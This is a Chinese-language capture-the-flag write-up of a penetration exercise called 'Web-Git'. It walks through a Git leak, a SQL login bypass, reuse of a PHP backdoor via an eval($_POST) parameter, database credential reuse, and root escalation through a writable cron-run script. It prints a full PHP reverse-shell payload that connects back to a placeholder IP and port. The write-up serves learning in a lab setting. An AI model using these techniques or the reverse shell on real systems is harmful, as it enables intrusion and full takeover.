ccb_isw_Web-Git

1. Web-Git
   1. flag1
   2. flag4
   3. flag3
   4. flag5

ccb半决赛（本文首发于先知社区

这个渗透拿了三个一血，就是最后root的flag没找到有点遗憾。

Web-Git

flag1

扫描WEB目录发现存在Git泄露（这里是队友扫的，我这图是拿的我后面扫的截图，所以时间对不上。

使用gakki429/Git_Extract拉取泄露代码。

读取到flag，全场一血捏。

flag4

一开始sql万能密码登录了后台，但是什么功能都没有。从后台头像路径，发现同路径下有一个php文件。

发现存在后门，参数a当时随便试两个就对了。

但是这个马是get传参的，蚁剑直接连连不了。可以?a=eval($_POST[a]);这样就可以连接了。

拿到flag4

flag3

数据库账号密码在web目录里面可以翻到。但是不能从外面直接连。必须localhost才能连接，挂上socks代理之后可以用localhost为ip来登录数据库，或者在蚁剑里面连接数据库。本来想用udf提权的，但是报错了。

在数据库里面翻到ryan密码，然后su ryan登录，读取mail即可(这里要注意，如果想用su登录用户的话必须要拿一个有tty的shell，我是用Venom自带的shell)

读取邮件

flag5

传一个pspy64上去监控一下进程，发现root用户每三分钟执行一次del.py。

并且del.py是777权限，所以我们直接利用python执行命令就是了。比如改成php a.php来弹个root的shell出来。或者写passwd，上线C2等等，方法有很多。

a.php内容

<?php
$ip='IP';
$port='PORT';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
  0 => $sock,
  1 => $sock,
  2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

据说root目录下的aim.jpg就是flag5。可惜当时没拿下来看。